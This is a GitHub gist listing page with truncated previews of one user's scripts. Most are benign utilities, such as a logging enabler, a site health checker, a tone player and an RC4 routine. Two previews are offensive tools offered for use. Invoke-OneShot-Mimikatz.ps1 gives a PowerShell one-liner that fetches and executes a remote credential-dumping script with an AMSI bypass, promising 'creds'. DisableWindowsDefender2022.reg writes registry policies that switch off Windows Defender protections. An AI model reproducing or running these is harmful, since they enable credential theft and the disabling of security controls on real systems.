View youtube-summarizer-with-langchain-chatgpt.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View shinolang.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View Invoke-OneShot-Mimikatz.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Confirm it works in Windows 10 2022 | |
# Dont download this but execute the next line in command prompt(cmd.exe) | |
# powershell iex (wget https://gist.githubusercontent.com/Sh1n0g1/b93b48a54276145bd117403a38fd9816/raw/637d7447dc7a99e21cfeec18bec950abbc1bd642/Invoke-OneShot-Mimikatz.ps1).Content | |
# You will get creds | |
# | |
# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021) | |
# https://payatu.com/blog/arun.nair/amsi-bypass | |
$code = @" | |
using System; |
View DisableWindowsDefender2022.reg
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender] | |
"DisableAntiSpyware"=dword:00000001 | |
"DisableRealtimeMonitoring"=dword:00000001 | |
"DisableAntiVirus"=dword:00000001 | |
"DisableSpecialRunningModes"=dword:00000001 | |
"DisableRoutinelyTakingAction"=dword:00000001 | |
"ServiceKeepAlive"=dword:00000000 |
View enable_powershell_logging.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
net session >nul 2>&1 | |
if %errorlevel% == 0 ( | |
echo|set /p="Adding registry 1:" | |
reg add HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ /v EnableModuleLogging /f /t REG_DWORD /d 1 | |
echo|set /p="Adding registry 2:" |
View webhealthcheck.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!python3 | |
import requests | |
import time | |
URL= [ | |
'http://shino.club/ ', | |
'https://shinobot.com/ ', | |
'https://mnd2015.info/ ', | |
'https://shinosec.com/ ', |
View Helloworld_C_Sharp.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$assemblies=( | |
"System" | |
) | |
$source=@" | |
using System; | |
namespace Helloworld | |
{ | |
public static class Hello{ | |
public static void Main(){ |
View Play-ShinoTone
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Play-ShinoTone{ | |
cls | |
$octave=2 | |
$keytone=@{ # http://pages.mtu.edu/~suits/notefreqs.html | |
'a'=261.63*$octave; # C | |
'w'=277.18*$octave; # C# | |
's'=293.66*$octave; # D | |
'e'=311.13*$octave; # D# | |
'd'=329.63*$octave; # E | |
'f'=349.23*$octave; # F |
View Get-ActiveTime.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Initialize | |
$Weekday=@("Monday","Tuesday","Wednesday","Thursday","Friday","Saturday","Sunday") | |
$LoginData=@{} | |
ForEach($w in $Weekday){ | |
$LoginData[$w]=@{} | |
0..23 | % {$LoginData[$w][$_]=0} | |
} | |
#Get the data from Eventlog | |
$i=0 |
View rc4.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
def rc4init(key): | |
x=0 | |
box = range(256) | |
for i in range(256): | |
x = (x + box[i] + ord(key[i % len(key)])) % 256 | |
box[i], box[x] = box[x], box[i] | |
return box |
NewerOlder